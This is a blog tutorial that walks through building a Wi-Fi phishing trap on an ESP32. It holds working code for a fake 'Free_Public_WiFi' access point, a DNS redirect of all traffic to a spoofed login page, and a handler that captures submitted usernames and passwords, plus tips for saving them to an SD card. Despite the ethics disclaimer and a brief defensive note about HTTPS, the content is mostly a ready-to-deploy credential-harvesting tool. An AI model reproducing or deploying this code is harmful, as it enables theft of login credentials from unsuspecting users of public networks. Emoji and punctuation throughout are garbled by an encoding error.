Captive Portal Trap | Chr0nicHacker

Captive Portal Trap: A Beginner’s Guide to Wi-Fi Phishing with ESP32

โš ๏ธ Disclaimer

This article is for educational use only. Demonstrating security flaws should always be done in a safe, controlled environment with permission. Stay ethical. Stay legal.

๐ŸŒ What is a Captive Portal Attack?

A captive portal trick mimics public Wi-Fi login pages. When users connect, theyโ€™re redirected to a fake login โ€” allowing attackers to demonstrate how open networks can be spoofed.

๐Ÿ› ๏ธ Hardware Needed

  • ESP32 Dev Board (with PSRAM recommended)
  • MicroSD card (optional)
  • Micro USB cable
  • Computer (Windows/Linux/macOS)

โš™๏ธ Software Requirements

  • Arduino IDE
  • ESP32 board support
  • Libraries: ESPAsyncWebServer, AsyncTCP, DNSServer

๐Ÿ”Œ ESP32 as a Fake Access Point

#include <WiFi.h>
const char *ssid = "Free_Public_WiFi";
void setup() {
  Serial.begin(115200);
  WiFi.softAP(ssid);
  Serial.println("Fake AP started.");
}
void loop() {}

๐Ÿ•ณ๏ธ DNS Redirection to Phishing Portal

#include <DNSServer.h>
#include <ESPAsyncWebServer.h>
const byte DNS_PORT = 53;
DNSServer dnsServer;
AsyncWebServer server(80);
void setup() {
  WiFi.softAP("Free_Public_WiFi");
  dnsServer.start(DNS_PORT, "*", WiFi.softAPIP());
  server.on("/", HTTP_GET, [](AsyncWebServerRequest *request){
    request->send(200, "text/html", "<h1>Login Page</h1><form><input type='text'><input type='submit'></form>");
  });
  server.begin();
}
void loop() {
  dnsServer.processNextRequest();
}

๐Ÿ“ Creating a Fake Login Page

<form method='POST' action='/login'>
  <label>Username:</label><input type='text' name='user'><br>
  <label>Password:</label><input type='password' name='pass'><br>
  <input type='submit' value='Login'>
</form>

To capture data:

server.on("/login", HTTP_POST, [](AsyncWebServerRequest *request){
  String user = request->getParam("user", true)->value();
  String pass = request->getParam("pass", true)->value();
  Serial.printf("Captured credentials: %s / %s\n", user.c_str(), pass.c_str());
  request->send(200, "text/html", "<h1>Connecting...</h1>");
});

๐Ÿง  What This Teaches

  • Creating fake networks
  • Intercepting web traffic
  • Why HTTPS and HSTS matter

๐Ÿ›ก๏ธ Real-World Use Cases (Ethical Only)

  • Penetration testing
  • Security awareness training
  • Red team simulation labs

๐Ÿงฐ Bonus Tips

  • Store data to SD card
  • Serve real HTML from SPIFFS
  • Redirect to a success page after login

โš ๏ธ Warning

Modern browsers enforce HTTPS and use captive portal detection. This technique is best for demonstration and learning. Use it ethically.

๐Ÿ“› Hack responsibly. Educate, donโ€™t exploit.
©
Scroll to Top